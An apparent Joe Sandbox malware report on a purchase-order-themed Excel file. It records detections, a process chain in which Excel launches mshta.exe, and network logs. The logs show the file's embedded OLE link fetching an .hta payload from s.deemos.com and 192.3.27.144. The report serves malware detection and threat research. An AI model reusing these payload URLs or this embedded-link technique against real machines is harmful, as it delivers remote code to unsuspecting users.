Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#3311-20250108003.xls

Overview

General Information

Sample name:PO#3311-20250108003.xls
Analysis ID:1585804
MD5:6a899fecf09eb7899fd6a521aba5eb5e
SHA1:2f514a32ca1990347a42c4f3934afcab5a341530
SHA256:519cda9511738dfa6ad57a5716bd217d9c44af7023907711ddc76c4511f24d60
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7048 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 7428 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8144 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 6904 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7048, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7428, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 53681
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 53681, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO#3311-20250108003.xlsReversingLabs: Detection: 24%
Source: PO#3311-20250108003.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:53681 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:53681
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.24:53682
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.24:53682 -> 192.3.27.144:80
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: global trafficHTTP traffic detected: GET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: global trafficHTTP traffic detected: GET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: Primary1736326142654391900_81BD980C-75DD-4A4B-AD02-2A4B72044766.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: PO#3311-20250108003.xlsString found in binary or memory: https://s.deemos.com/fmGZaVnS?&bush=watc
Source: 10131000.0.drString found in binary or memory: https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork
Source: unknownNetwork traffic detected: HTTP traffic on port 53681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53681

System Summary

barindex
Source: PO#3311-20250108003.xlsOLE: Microsoft Excel 2007+
Source: 10131000.0.drOLE: Microsoft Excel 2007+
Source: PO#3311-20250108003.xlsOLE indicator, VBA macros: true
Source: PO#3311-20250108003.xlsStream path 'MBD01010D3E/\x1Ole' : https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkApM{Tf]Qr*d$kI#+U|ZEEEf,U(I=XGXKXW N{cxzp^C7e|K''oIN4pog&Pqg18NBS~ylQB1d5JaPm4Bn5Cfjbk2ZFCYBomXxTyTDdxzqyhpiszBSa6d09v5fQPo2DGvldDoovZL6yBWAfzkh3otuClceAb0Dd86fg4Bn0Qhp4oFaFmxOlMeV4bWqE3MsPbznD5th5aCFx6aMwiXAh3BwhE9VHCpYvJtFlB2ZbuTdCQE7PwTUjFn12OUljTeB0Zl2>9s3m.2=whO(
Source: 10131000.0.drStream path 'MBD01010D3E/\x1Ole' : https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkApM{Tf]Qr*d$kI#+U|ZEEEf,U(I=XGXKXW N{cxzp^C7e|K''oIN4pog&Pqg18NBS~ylQB1d5JaPm4Bn5Cfjbk2ZFCYBomXxTyTDdxzqyhpiszBSa6d09v5fQPo2DGvldDoovZL6yBWAfzkh3otuClceAb0Dd86fg4Bn0Qhp4oFaFmxOlMeV4bWqE3MsPbznD5th5aCFx6aMwiXAh3BwhE9VHCpYvJtFlB2ZbuTdCQE7PwTUjFn12OUljTeB0Zl2>9s3m.2=whO(
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal64.expl.winXLS@6/14@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\10131000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{81BD980C-75DD-4A4B-AD02-2A4B72044766} - OProcSessId.datJump to behavior
Source: PO#3311-20250108003.xlsOLE indicator, Workbook stream: true
Source: 10131000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO#3311-20250108003.xlsReversingLabs: Detection: 24%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
